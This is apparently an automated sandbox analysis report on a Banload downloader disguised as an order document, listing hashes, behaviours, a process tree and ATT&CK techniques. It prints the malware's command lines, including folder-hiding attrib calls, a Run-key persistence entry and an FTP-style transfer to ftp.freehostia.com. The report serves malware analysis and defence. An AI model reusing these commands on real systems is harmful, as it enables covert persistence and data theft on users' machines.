Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel: 3s
  max time network: 1s
  platform: windows7_x64
  resource: win7-20240508-en
  resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  submitted: 20/05/2024, 04:40
Static task: static1
Behavioral task: behavioral1
  Sample: Order details 20160623103529.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: Order details 20160623103529.exe
  Resource: win10v2004-20240508-en
General
  Target: Order details 20160623103529.exe
  Size: 2.3MB
  MD5: 07a4eab7815d7240e9d3d38f7df9be36
  SHA1: 2fcb5ee484b60dcadd3ef4aa4ab2f6b22f8e78f4
  SHA256: 14d2a798476194ebc48db82141fa597c7ac6a91094f36a1311d857579c867017
  SHA512: 4fe7adbfcd46ef19d3ce73f4342a197579d6653c7bba96e65813fe6d076cadc87ff2e0d640035656a044566e21e21dcf4393191f4d6330f25319f476611686ab
  SSDEEP: 49152:Ipgs8ABpNAcbBicSTgbDgtcBbWRzfYb/kL+agsNFCriQmew54a11Fp:IGs8AvNzXgtcpEfFFC2QVbalp
Malware Config
Signatures

Banload
  Banload variants download malicious files, then install and execute the files.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  description / ioc / process:
    Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  adbr01.exe

Sets file to hidden (1 TTP, 5 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  pid / process:
    1944  attrib.exe
    2492  attrib.exe
    856   attrib.exe
    1244  attrib.exe
    2484  attrib.exe

Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  description / ioc / process:
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  adbr01.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate     adbr01.exe

Executes dropped EXE (3 IoCs)
  pid / process:
    772   Adobeta.exe
    912   adbr01.exe
    1740  adbr01.exe

Loads dropped DLL (5 IoCs)
  pid / process:
    1968  cmd.exe
    1968  cmd.exe
    1968  cmd.exe
    1968  cmd.exe
    912   adbr01.exe

Adds Run key to start application (2 TTPs, 1 IoC)
  description / ioc / process:
    Set value (str)  \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat"  reg.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Enumerates system info in registry (2 TTPs, 1 IoC)
  description / ioc / process:
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier  xcopy.exe

Gathers network information (2 TTPs, 1 IoC)
  Uses commandline utility to view network configuration.
  pid / process:
    1764  ipconfig.exe

Modifies registry class (13 IoCs)
  description / ioc / process (all by adbr01.exe):
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib\ = "{012F24C1-35B0-11D0-BF2D-0000E8D0D146}"
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version\ = "1.0"
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "Office.awsdc"
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment"
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "C:\\PROGRA~2\\MICROS~1\\Office14\\IEAWSDC.DLL"
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "Office.awsdc.1"
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Microsoft Office Template and Media Control"
    Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32

Suspicious use of FindShellTrayWindow (1 IoC)
  pid / process:
    2864  DllHost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  description / pid / process / procid_target (identical rows grouped; the count is the number of times the row appears in the report):
    PID 2128 wrote to memory of 2696  2128  Order details 20160623103529.exe  28  (x7)
    PID 2696 wrote to memory of 2104  2696  WScript.exe                       29  (x7)
    PID 2104 wrote to memory of 2968  2104  cmd.exe                           32  (x7)
    PID 2104 wrote to memory of 2492  2104  cmd.exe                           33  (x7)
    PID 2104 wrote to memory of 856   2104  cmd.exe                           34  (x7)
    PID 2104 wrote to memory of 1244  2104  cmd.exe                           35  (x7)
    PID 2104 wrote to memory of 2484  2104  cmd.exe                           36  (x7)
    PID 2104 wrote to memory of 1944  2104  cmd.exe                           37  (x7)
    PID 2104 wrote to memory of 1964  2104  cmd.exe                           38  (x7)
    PID 1964 wrote to memory of 1968  1964  WScript.exe                       39  (x1)

Views/modifies file attributes (1 TTP, 5 IoCs)
  pid / process:
    2492  attrib.exe
    856   attrib.exe
    1244  attrib.exe
    2484  attrib.exe
    1944  attrib.exe
Processes
(indentation shows the parent/child depth reported by the sandbox)

[1] C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\Order details 20160623103529.exe"
    PID: 2128
    signatures: Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\WScript.exe
      command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
      PID: 2696
      signatures: Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        command line: cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
        PID: 2104
        signatures: Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\xcopy.exe
          command line: xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
          PID: 2968
          signatures: Enumerates system info in registry

      [4] C:\Windows\SysWOW64\attrib.exe
          command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
          PID: 2492
          signatures: Sets file to hidden; Views/modifies file attributes

      [4] C:\Windows\SysWOW64\attrib.exe
          command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
          PID: 856
          signatures: Sets file to hidden; Views/modifies file attributes

      [4] C:\Windows\SysWOW64\attrib.exe
          command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
          PID: 1244
          signatures: Sets file to hidden; Views/modifies file attributes

      [4] C:\Windows\SysWOW64\attrib.exe
          command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
          PID: 2484
          signatures: Sets file to hidden; Views/modifies file attributes

      [4] C:\Windows\SysWOW64\attrib.exe
          command line: attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
          PID: 1944
          signatures: Sets file to hidden; Views/modifies file attributes

      [4] C:\Windows\SysWOW64\WScript.exe
          command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
          PID: 1964
          signatures: Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\cmd.exe
            command line: cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
            PID: 1968
            signatures: Loads dropped DLL

          [6] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
              command line: Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
              PID: 772
              signatures: Executes dropped EXE

          [6] C:\Windows\SysWOW64\reg.exe
              command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
              PID: 492
              signatures: Adds Run key to start application

          [6] C:\Windows\SysWOW64\ipconfig.exe
              command line: ipconfig /all
              PID: 1764
              signatures: Gathers network information

          [6] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
              command line: adbr01.exe -f "011.011"
              PID: 912
              signatures: Executes dropped EXE; Loads dropped DLL

            [7] C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
                command line: adbr01.exe -f "011.011"
                PID: 1740
                signatures: Identifies VirtualBox via ACPI registry values (likely anti-VM); Checks BIOS information in registry; Executes dropped EXE; Modifies registry class

[1] C:\Windows\SysWOW64\DllHost.exe
    command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
    PID: 2864
    signatures: Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
  Privilege Escalation
    Boot or Logon Autostart Execution (1)
      Registry Run Keys / Startup Folder (1)
  Defense Evasion
    Hide Artifacts (2)
      Hidden Files and Directories (2)
    Modify Registry (1)
    Virtualization/Sandbox Evasion (1)
Downloads

  Filesize: 118B
  MD5: 9275864a850bf2c9d21d8b158be4999e
  SHA1: 838ebcbc1a27c9d8dbad268de77877bf892f5223
  SHA256: ff279561e09b341b77ace01b0d71152e8471e5c8767aedaa16c9096774727511
  SHA512: ba58a479507bf8e705189e3283ac5a91c11f6ac276efb2e40ee583a1595cbf7c5204c56fab7a46bfae19d7089f25466303f1baafc7d260d86cb48db073786a8d

  Filesize: 124KB
  MD5: 1a1075e5e307f3a4b8527110a51ce827
  SHA1: f453838ed21020b7ca059244feea8579e5aa74ef
  SHA256: ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
  SHA512: b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

  Filesize: 556B
  MD5: 97410477dc9501dffca4ea4b1ae57273
  SHA1: fb573b3bf4eba734b0f32db1a5b7ff78de36b064
  SHA256: 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c
  SHA512: 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915

  Filesize: 186B
  MD5: 09082253605a7171f078e26dc308a667
  SHA1: 585286c9fcda5e66e7fdb4e17a7bab6160183d46
  SHA256: f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed
  SHA512: adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

  Filesize: 189B
  MD5: ce8041824149d8266dbb0ad9688224d7
  SHA1: 3ab653c43ce66681ceaab90193e1a4c95d998090
  SHA256: 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5
  SHA512: e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

  Filesize: 256KB
  MD5: 97b8dbcc7b3cc290aef4241df911ac2e
  SHA1: 733ababbcd278821d4e3ee78580841981f26642e
  SHA256: c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023
  SHA512: 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

  Filesize: 139B
  MD5: 89412aba215b6cd18b8a64c4485fa03f
  SHA1: 37089346499f54a7d89262a67d95c8764ab3ca1f
  SHA256: 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1
  SHA512: 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b

  Filesize: 2.1MB
  MD5: 3351585db91521d6fa543490ac7cd6a5
  SHA1: 9be2b3abf17613d7386f9949cabaedd466902e82
  SHA256: 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4
  SHA512: 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30

  Filesize: 2.1MB
  MD5: 75a35514185cd2c5cf5aab50cc380963
  SHA1: f1ff1e088f910398a48f4f7dfddec24e6d6d1734
  SHA256: 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937
  SHA512: ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297

  Filesize: 1KB
  MD5: ce7ccd3b48dbe8f34db3b2b1222e4fd9
  SHA1: e25f9947c2b250c98dffd7bfeaca75b4db17dcfd
  SHA256: 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e
  SHA512: ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99